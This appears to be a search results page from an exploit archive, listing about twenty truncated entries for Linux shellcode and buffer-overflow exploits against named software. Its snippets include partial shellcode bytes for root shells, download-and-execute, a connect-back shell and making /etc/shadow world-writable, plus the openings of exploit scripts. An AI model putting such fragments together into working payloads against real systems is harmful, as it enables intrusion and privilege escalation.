7260 matches found
linux/x86 setuid(0) & execve(/bin/sh,0,0) shellcode 28 bytes
-------------------ASM---------------------- global start section .text start: ;setuid0 xor ebx,ebx lea eax,ebx+17h cdq int 80h ;execve/bin/sh,0,0 xor ecx,ecx push ecx push 0x68732f6e push 0x69622f2f lea eax,ecx+0Bh mov ebx,esp int 80h...
Find all writeable folder in filesystem linux polymorphic shellcode - 91 bytes
/ Title : Find all writeable folder in filesystem linux polymorphic shellcode . Name : 91 bytes Find all writeable folder in filesystem linux polymorphic shellcode . Date : Sat Jun 17 21:27:03 2010 Author : gunslinger yudha.gunslingeratgmail.com Web :...
linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes
/ Linux/x86 setuid0 + setgid0 + execve/bin/sh, /bin/sh, NULL - 37 bytes - [email protected] / char shellcode = \x6a\x17 // push $0x17 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \xcd\x80 // int $0x80 \x6a\x2e // push $0x2e \x58 // pop %eax \x53 // push %ebx...
Linux x86 egghunt shellcode
/ Exploit Title: Linux/x86 egghunt shellcode 29 bytes NULL free Date: 23-07-2011 Author: Ali Raheem Tested on: Linux Ali-PC.home 2.6.38.8-35.fc15.x8664 1 SMP Wed Jul 6 13:58:54 UTC 2011 x8664 x8664 x8664 GNU/Linux Linux injustice 2.6.38-10-generic 46-Ubuntu SMP...
linux/x86 setreuid(0,0) execve("/bin/sh", ["/bin/sh", NULL]) 33 bytes
/ Linux/x86 setreuid0,0 + execve/bin/sh, /bin/sh, NULL - 33 bytes - [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx, %ebx \x31\xc9 // xor %ecx, %ecx \xcd\x80 // int $0x80 \x31\xd2 // xor %edx, %edx \x6a\x0b // pus...
linux/x86 HTTP/1.x GET, Downloads and JMP - 68 bytes+
/ linux/x86 HTTP/1.x GET, Downloads and JMP - 68 bytes+ This shellcode allows you to download a binary code straight off a standard HTTP server and execute it. The downloaded shellcode e.g. binary code will be executed on the stack. DEMONSTRATION: Starting by...
Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.
/ Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include stdio.h char sc = \x24\x0f\xff\xfd // li t7,-3 \x01\xe0\x20\x27 // nor a0,t7,zero \x01\xe0\x28\x27 // nor a1,t7,zero \x28\x06\xff\xff // sl...
linux/x86 chmod(/etc/shadow, 0666) + exit() 32 bytes
/ linux/x86 chmod/etc/shadow, 0666 + exit - 32 bytes - izik [email protected] / char shellcode = \x6a\x0f // push $0xf \x58 // pop %eax \x31\xc9 // xor %ecx,%ecx \x51 // push %ecx \x66\xb9\xb6\x01 // mov $0x1b6,%cx \x68\x61\x64\x6f\x77 // push $0x776f6461...
linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes
/ linux/x86 setreuid0, 0 + execve/bin/sh, /bin/sh, NULL, NULL - 31 bytes - izik [email protected] / char shellcode = \x6a\x46 // push $0x46 \x58 // pop %eax \x31\xdb // xor %ebx,%ebx \x31\xc9 // xor %ecx,%ecx \xcd\x80 // int $0x80 \x99 // cltd \xb0\x0b // mov...
linux/x86 normal exit with random (so to speak) return value 5 bytes
/ linux/x86 normal exit w/ random so to speak return value - 5 bytes - izik [email protected] / char shellcode = \x31\xc0 // xor %eax,%eax \x40 // inc %eax \xcd\x80; // int $0x80 int mainint argc, char argv int ret; ret = int &ret + 2; ret = int shellcode; //...
FreeFloat FTP Server Buffer Overflow Exploit (DEP Bypass)
!/usr/bin/python import socket, sys from struct import pack print \n=============================== print Freefloat FTP Server DEP Bypass print Written by Blake print ===============================\n if lensys.argv != 3: print Usage: %s target port\n % sys.argv...
MediaCoder 0.7.3.4605 - Local Buffer Overflow Exploit
/ Download: http://www.mediacoderhq.com/download.htm Compilation: mediac.c.......Win32cygwin,Devcpp Tested on Windows xp sp3 Date: 24.02.2010 1.We get control of EIP by overwriting a seh handler with pop pop retn instr and pass exception. 2.We position shellcode...
linux/x86 quick (yet conditional, eax != 0 and edx == 0) exit 4 bytes
/ linux/x86 quick yet conditional, eax != 0 and edx == 0 exit - 4 bytes - izik [email protected] / char shellcode = \xf7\xf0 // div %eax \xcd\x80; // int $0x80 int mainint argc, char argv int ret; ret = int &ret + 2; ret = int shellcode; // milw0rm.com 2006-01-21...
Magneto Net Resource ActiveX 4.0.0.5 - NetFileClose Exploit (Universal)
html object classid='clsid:61251370-92BF-4A0E-8236-5904AC6FC9F2' id='target' //object script language='vbscript' 'Magneto Software Net Resource ActiveX v4.0.0.5 NetFileClose SEH Exploit Universal 'Author: dookie 'Original PoC by: s4squatch -...
linux/x86 cat /dev/urandom > /dev/console, just for kicks - 63 bytes
/ linux/x86 cat /dev/urandom /dev/console, no real profit just for kicks - 63 bytes - izik [email protected] / char shellcode = \x31\xc9 // xor %ecx,%ecx \x51 // push %ecx \x68\x6e\x64\x6f\x6d // push $0x6d6f646e \x68\x2f\x75\x72\x61 // push $0x6172752f...
Linux Kernel 2.6.x - ptrace_attach Local Privilege Escalation Exploit
/ ptraceattach privilege escalation exploit by s0m3b0dy tested on Gentoo 2.6.29rc1 grataz: Tazo, rassta, nukedclx, maciek, D0hannuk, mivus, wacky, nejmo, filo... email: s0m3b0dy1 at gmail.com / include grp.h include stdio.h include fcntl.h include errno.h includ...
Adobe util.printf() Buffer Overflow (2)
$Id: adobeutilprintf.rb 10477 2010-09-25 11:59:02Z mc $ This file is part of the Metasploit Framework and may be subject to redistribution and commercial restrictions. Please see the Metasploit Framework web site for more information on licensing and terms of us...
TipxD <= 1.1.1 - Local Format String Vulnerability (not setuid)
/ tipxdexp.c TipxD Format String Vulnerability TipxD = 1.1.1 local exploit Proof of Concept Tested in Slackware 9.0 / 9.1 / 10.0 by CoKi [email protected] - SECU No System Group - http://www.nosystem.com.ar / include stdio.h include string.h define PATH...
GTA SA-MP server.cfg - Local Buffer Overflow Vulnerability
GTA SA-MP server.cfg Local Buffer Overflow Vulnerability 0day Date: 9-26-11 Author: SilentDream Software Link: http://team.sa-mp.com/files/samp03csvrR2-2win32.zip Tested on: XP SP3, Windows 7 Thanks to: corelanc0d3r & team, Metasploit, Exploit-db. No PPRs found...
MPlayer Lite r33064 - m3u Buffer Overflow Exploit (DEP Bypass)
!/usr/bin/perl +Exploit Title: MPlayer Lite r33064 m3u Buffer Overflow ExploitDEP BYPASS +Date: 24\07\2011 +Author: C4SS!0 and h1ch4m +Software Link: http://sourceforge.net/projects/mplayer-ww/files/MPlayerRelease/Revision%2033064/mplayerliter33064.7z/download...